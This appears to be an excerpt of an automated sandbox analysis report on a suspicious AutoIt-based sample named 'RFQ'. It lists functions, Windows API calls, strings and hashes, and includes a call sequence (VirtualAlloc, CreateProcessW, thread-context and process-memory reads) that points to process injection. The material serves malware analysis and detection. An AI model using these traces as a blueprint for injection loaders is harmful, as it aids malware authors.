                                                                          • Instruction Fuzzy Hash: 29A10A74E01209EBDB14DFA4C894BEEBBB9BF48305F20819DE501BB280D775AA81DF55
                                                                          Function 0040E4C0 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 79registryCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 1219 40e4c0-40e4e5 call 403350 RegOpenKeyExW 1222 427190-4271ae RegQueryValueExW 1219->1222 1223 40e4eb-40e4f0 1219->1223 1224 4271b0-4271f5 call 4115d7 call 43652f RegQueryValueExW 1222->1224 1225 42721a-42722a RegCloseKey 1222->1225 1230 427210-427219 call 436508 1224->1230 1231 4271f7-42720e call 402160 1224->1231 1230->1225 1231->1230
                                                                          APIs
                                                                          • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,?,?,0040E4A1), ref: 0040E4DD
                                                                          • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,0040E4A1,00000000,?,?,?,0040E4A1), ref: 004271A6
                                                                          • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,0040E4A1,?,00000000,?,?,?,?,0040E4A1), ref: 004271ED
                                                                          • RegCloseKey.ADVAPI32(?,?,?,?,0040E4A1), ref: 0042721E
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: QueryValue$CloseOpen
                                                                          • String ID: Include$Software\AutoIt v3\AutoIt
                                                                          • API String ID: 1586453840-614718249
                                                                          • Opcode ID: 413bff81f872addaca3d9ad162024b649ce289641a3285436bc7eb0a5f7ce606
                                                                          • Instruction ID: d6672e68ffeed78ba434be4ce119fa1e10800d5a5bf196f8e2f41644cb46c1f5
                                                                          • Opcode Fuzzy Hash: 413bff81f872addaca3d9ad162024b649ce289641a3285436bc7eb0a5f7ce606
                                                                          • Instruction Fuzzy Hash: CF21D871780204BBDB14EBF4ED46FAF737CEB54700F10055EB605E7281EAB5AA008768
                                                                          Function 00410570 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 43COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 1236 410570-4105f1 CreateWindowExW * 2 ShowWindow * 2
                                                                          APIs
                                                                          • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,?,00000000), ref: 004105A5
                                                                          • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,?,00000000), ref: 004105CE
                                                                          • ShowWindow.USER32(?,00000000), ref: 004105E4
                                                                          • ShowWindow.USER32(?,00000000), ref: 004105EE
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: Window$CreateShow
                                                                          • String ID: AutoIt v3$edit
                                                                          • API String ID: 1584632944-3779509399
                                                                          • Opcode ID: b28a7d78b19f48c216133de275d8b0452446851dd496b073adb1022152ad6d67
                                                                          • Instruction ID: 021b1916d714280a6beb379f8f8b29d81737bdb93309e58067b2166fb7f1837a
                                                                          • Opcode Fuzzy Hash: b28a7d78b19f48c216133de275d8b0452446851dd496b073adb1022152ad6d67
                                                                          • Instruction Fuzzy Hash: 29F01771BE43107BF6B0A764AC43F5A2698A758F65F31083BB700BB5D0E1E4B8408B9C
                                                                          Function 040323F8 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 161fileCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 1237 40323f8-403256c call 4030048 call 40322e8 CreateFileW 1244 4032573-4032583 1237->1244 1245 403256e 1237->1245 1248 4032585 1244->1248 1249 403258a-40325a4 VirtualAlloc 1244->1249 1246 4032623-4032628 1245->1246 1248->1246 1250 40325a6 1249->1250 1251 40325a8-40325bf ReadFile 1249->1251 1250->1246 1252 40325c3-40325fd call 4032328 call 40312e8 1251->1252 1253 40325c1 1251->1253 1258 4032619-4032621 ExitProcess 1252->1258 1259 40325ff-4032614 call 4032378 1252->1259 1253->1246 1258->1246 1259->1258
                                                                          APIs
                                                                            • Part of subcall function 040322E8: Sleep.KERNELBASE(000001F4), ref: 040322F9
                                                                          • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 0403255F
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1284925930.0000000004030000.00000040.00000020.00020000.00000000.sdmp, Offset: 04030000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_4030000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: CreateFileSleep
                                                                          • String ID: IBRHLVPXHZSJ2YHEL7DL697DVXJRU
                                                                          • API String ID: 2694422964-3350424600
                                                                          • Opcode ID: 044663121cafe2973659db2fc88cfdd81d74b9906da7b22167c6561b5cf46e66
                                                                          • Instruction ID: a9c2f09a50a47bb9c547f241f82e89bbb3214204953e3daf1a47349b6ae0478d
                                                                          • Opcode Fuzzy Hash: 044663121cafe2973659db2fc88cfdd81d74b9906da7b22167c6561b5cf46e66
                                                                          • Instruction Fuzzy Hash: 55618330D04288DAEF11DBB4D844BDEBFB9AF19305F04419DE6487B2C1D7B91A49CB66
                                                                          Function 0040F250 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 66registryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • RegOpenKeyExW.KERNELBASE(00000004,Control Panel\Mouse,00000000,00000001,00000004,00000004), ref: 0040F267
                                                                          • RegQueryValueExW.KERNELBASE(00000000,?,00000000,00000000,?,?,00000002,00000000), ref: 0040F28E
                                                                          • RegCloseKey.KERNELBASE(?), ref: 0040F2B5
                                                                          • RegCloseKey.ADVAPI32(?), ref: 0040F2C9
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: Close$OpenQueryValue
                                                                          • String ID: Control Panel\Mouse
                                                                          • API String ID: 1607946009-824357125
                                                                          • Opcode ID: 0a2ddf5dd10fc63f6e19eedc2563a5e53f3783e3c799d68c1c3a3a1866560054
                                                                          • Instruction ID: a31ac2e1b7deaa2d1d9e7506379341dce8fcd1dacbe24dc49005ae4a0027d3ba
                                                                          • Opcode Fuzzy Hash: 0a2ddf5dd10fc63f6e19eedc2563a5e53f3783e3c799d68c1c3a3a1866560054
                                                                          • Instruction Fuzzy Hash: 91118C76640108AFCB10CFA8ED459EFB7BCEF59300B1089AAF908C3210E6759A11DBA4
                                                                          Function 004102B0 Relevance: 7.6, APIs: 5, Instructions: 87COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • SHGetMalloc.SHELL32(0040F54C), ref: 004102BD
                                                                          • SHGetDesktopFolder.SHELL32(?,004A90E8), ref: 004102D2
                                                                          • _wcsncpy.LIBCMT ref: 004102ED
                                                                          • SHGetPathFromIDListW.SHELL32(?,?), ref: 00410327
                                                                          • _wcsncpy.LIBCMT ref: 00410340
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: _wcsncpy$DesktopFolderFromListMallocPath
                                                                          • String ID:
                                                                          • API String ID: 3170942423-0
                                                                          • Opcode ID: bfe3e3032d26ed5990890659b1503a19068975a9e613434ef85ace480ecdfa96
                                                                          • Instruction ID: 8627f7bfe00d67ecf541507c27de0d1a6b0c746b93627a891ac6cfe5d1469166
                                                                          • Opcode Fuzzy Hash: bfe3e3032d26ed5990890659b1503a19068975a9e613434ef85ace480ecdfa96
                                                                          • Instruction Fuzzy Hash: 4B219475A00619ABCB14DBA4DC84DEFB37DEF88700F108599F909D7210E674EE45DBA4
                                                                          Function 040312E8 Relevance: 6.7, APIs: 4, Instructions: 720processthreadCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • CreateProcessW.KERNELBASE(?,00000000), ref: 04031AA3
                                                                          • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 04031B39
                                                                          • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 04031B5B
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1284925930.0000000004030000.00000040.00000020.00020000.00000000.sdmp, Offset: 04030000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_4030000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                                          • String ID:
                                                                          • API String ID: 2438371351-0
                                                                          • Opcode ID: 932a8f43b2c324a6e880b45aa11ae59a53f266e36399e6caa3e7e9a692624255
                                                                          • Instruction ID: d86496225db361e32cdea7b48e450a81d0c7ac71a6afd20b845d28b10e252171
                                                                          • Opcode Fuzzy Hash: 932a8f43b2c324a6e880b45aa11ae59a53f266e36399e6caa3e7e9a692624255
                                                                          • Instruction Fuzzy Hash: 90620B30A14258DBEB24CFA4C840BDEB776EF58705F1091A9D10DFB290E776AE81CB59
                                                                          Function 0040BD80 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 93COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: _memmove
                                                                          • String ID: Error:
                                                                          • API String ID: 4104443479-232661952
                                                                          • Opcode ID: 20a21836adb2195423de36251fb93945767d574b7418eb2d4267c7510a98c7d8
                                                                          • Instruction ID: 2c658176ab693071ca67d4d31bd2fe4acf4d59654e7b744331f3a235cb1e2e29
                                                                          • Opcode Fuzzy Hash: 20a21836adb2195423de36251fb93945767d574b7418eb2d4267c7510a98c7d8
                                                                          • Instruction Fuzzy Hash: 0D3191716006059FC324DF29C881AA7B3E6EF84314B24853FE95AC7791EB79E941CBD8
                                                                          Function 0040F520 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetOpenFileNameW.COMDLG32(?), ref: 0042961B
                                                                            • Part of subcall function 00410120: GetFullPathNameW.KERNEL32(00000000,00000104,004A7F6C,0040F545,004A7F6C,004A90E8,004A7F6C,?,0040F545), ref: 0041013C
                                                                            • Part of subcall function 004102B0: SHGetMalloc.SHELL32(0040F54C), ref: 004102BD
                                                                            • Part of subcall function 004102B0: SHGetDesktopFolder.SHELL32(?,004A90E8), ref: 004102D2
                                                                            • Part of subcall function 004102B0: _wcsncpy.LIBCMT ref: 004102ED
                                                                            • Part of subcall function 004102B0: SHGetPathFromIDListW.SHELL32(?,?), ref: 00410327
                                                                            • Part of subcall function 004102B0: _wcsncpy.LIBCMT ref: 00410340
                                                                            • Part of subcall function 00410190: GetFullPathNameW.KERNEL32(?,00000104,?,?,?), ref: 004101AB
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: NamePath$Full_wcsncpy$DesktopFileFolderFromListMallocOpen
                                                                          • String ID: X$pWH
                                                                          • API String ID: 85490731-941433119
                                                                          • Opcode ID: 1b62eedeb2ba23f3a12794f4d72c3fd3ac9c0abd578206ca8986e50026ca9cbc
                                                                          • Instruction ID: b6f0e4d7e30e2857a1e9cc165fafff24640ac0dd2e9829c062eaf90218724cbe
                                                                          • Opcode Fuzzy Hash: 1b62eedeb2ba23f3a12794f4d72c3fd3ac9c0abd578206ca8986e50026ca9cbc
                                                                          • Instruction Fuzzy Hash: 1F118AB0A00244ABDB11EFD9DC457DEBBF95F45304F14842AE504AB392D7FD08498BA9
                                                                          Function 00401B10 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 41COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • _wcslen.LIBCMT ref: 00401B11
                                                                            • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                          • _memmove.LIBCMT ref: 00401B57
                                                                            • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
                                                                            • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
                                                                            • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: std::exception::exception$Exception@8Throw_malloc_memmove_wcslen
                                                                          • String ID: @EXITCODE
                                                                          • API String ID: 2734553683-3436989551
                                                                          • Opcode ID: b6d17f11840b334af4eb2c0dc4703dd6ec7fe6b5974f9b569570c14fa5f7c58b
                                                                          • Instruction ID: 16ac7666fc6b8d0cd4c8082de1062d74cbdf630d8e5b0a9ec9a55ac2b86b5c72
                                                                          • Opcode Fuzzy Hash: b6d17f11840b334af4eb2c0dc4703dd6ec7fe6b5974f9b569570c14fa5f7c58b
                                                                          • Instruction Fuzzy Hash: D5F0CDF2B00641AFD720DB36DC02B6775E49B84308F04883EA24BC6795FA7DE4828B14
                                                                          Function 00475077 Relevance: 4.9, APIs: 3, Instructions: 390COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: afcf258d4bd88d8ea756dbb23f6f5e28355c73968809c2117334dc7dbfffea7a
                                                                          • Instruction ID: 8c99b1ef877cebc7a747b8a97cc81d83a07aa3771b44d3adc2ea031a64448d8d
                                                                          • Opcode Fuzzy Hash: afcf258d4bd88d8ea756dbb23f6f5e28355c73968809c2117334dc7dbfffea7a
                                                                          • Instruction Fuzzy Hash: CEF18C716043019FC700DF29C884A5AB7E5FF88318F14C95EF9998B392D7B9E945CB86
                                                                          Function 00414ABA Relevance: 4.7, APIs: 3, Instructions: 160COMMONLIBRARYCODE
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: __filbuf__getptd_noexit__read_memcpy_s
                                                                          • String ID:
                                                                          • API String ID: 1794320848-0
                                                                          • Opcode ID: b5af9ce9d8135965a8c163c1359f1833c669f36246c0dfec509ee2915f8c5eb0
                                                                          • Instruction ID: 2f36134af58cf06217a4581a57f76d3547d7b7b98d7afe96428f3577b7504850
                                                                          • Opcode Fuzzy Hash: b5af9ce9d8135965a8c163c1359f1833c669f36246c0dfec509ee2915f8c5eb0
                                                                          • Instruction Fuzzy Hash: 6C51E631A01208DBCB249F69C9446DFB7B1AFC0364F25826BE43597290E378EED1CB59
                                                                          Function 00475300 Relevance: 4.6, APIs: 3, Instructions: 141COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetCurrentProcess.KERNEL32(00000000,?,00000067,000000FF), ref: 004753C7
                                                                          • TerminateProcess.KERNEL32(00000000), ref: 004753CE
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: Process$CurrentTerminate
                                                                          • String ID:
                                                                          • API String ID: 2429186680-0
                                                                          • Opcode ID: 0f578ce52da9f9b4c714c296b9d78fbd636f242c945bc8d5a468c0e4c8bdb3ba
                                                                          • Instruction ID: dddcdfafc98398d1c0f0a19edd80e49036cf45bbfca44c020541658de01b6296
                                                                          • Opcode Fuzzy Hash: 0f578ce52da9f9b4c714c296b9d78fbd636f242c945bc8d5a468c0e4c8bdb3ba
                                                                          • Instruction Fuzzy Hash: 2C519D71604301AFC710DF65C881BABB7E5EF88308F14891EF9598B382D7B9D945CB96
                                                                          Function 0043213D Relevance: 4.5, APIs: 3, Instructions: 38COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • _malloc.LIBCMT ref: 0043214B
                                                                            • Part of subcall function 004135BB: __FF_MSGBANNER.LIBCMT ref: 004135D4
                                                                            • Part of subcall function 004135BB: __NMSG_WRITE.LIBCMT ref: 004135DB
                                                                            • Part of subcall function 004135BB: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,004115F6,?,00401BAC,?,?,?), ref: 00413600
                                                                          • _malloc.LIBCMT ref: 0043215D
                                                                          • _malloc.LIBCMT ref: 0043216F
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: _malloc$AllocateHeap
                                                                          • String ID:
                                                                          • API String ID: 680241177-0
                                                                          • Opcode ID: ab61ccc74db86e6fcdeb904a32b1d9569ed7ac6f88b96914968634a5dd1a0039
                                                                          • Instruction ID: dac51259f70ca5acf95ac1b1a30df86389447b5c3122b5fc7e5239b6c816f1c7
                                                                          • Opcode Fuzzy Hash: ab61ccc74db86e6fcdeb904a32b1d9569ed7ac6f88b96914968634a5dd1a0039
                                                                          • Instruction Fuzzy Hash: A0F0E273200B142AD2206A6A6DC1BE7B39ADBD4765F00403FFB058A206DAE9988542EC
                                                                          Function 0040F570 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 247COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 0040F760: _strcat.LIBCMT ref: 0040F786
                                                                          • _free.LIBCMT ref: 004295A0
                                                                            • Part of subcall function 004033C0: GetCurrentDirectoryW.KERNEL32(00000104,?,?), ref: 00403451
                                                                            • Part of subcall function 004033C0: GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 00403467
                                                                            • Part of subcall function 004033C0: __wsplitpath.LIBCMT ref: 00403492
                                                                            • Part of subcall function 004033C0: _wcscpy.LIBCMT ref: 004034A7
                                                                            • Part of subcall function 004033C0: _wcscat.LIBCMT ref: 004034BC
                                                                            • Part of subcall function 004033C0: SetCurrentDirectoryW.KERNEL32(?), ref: 004034CC
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
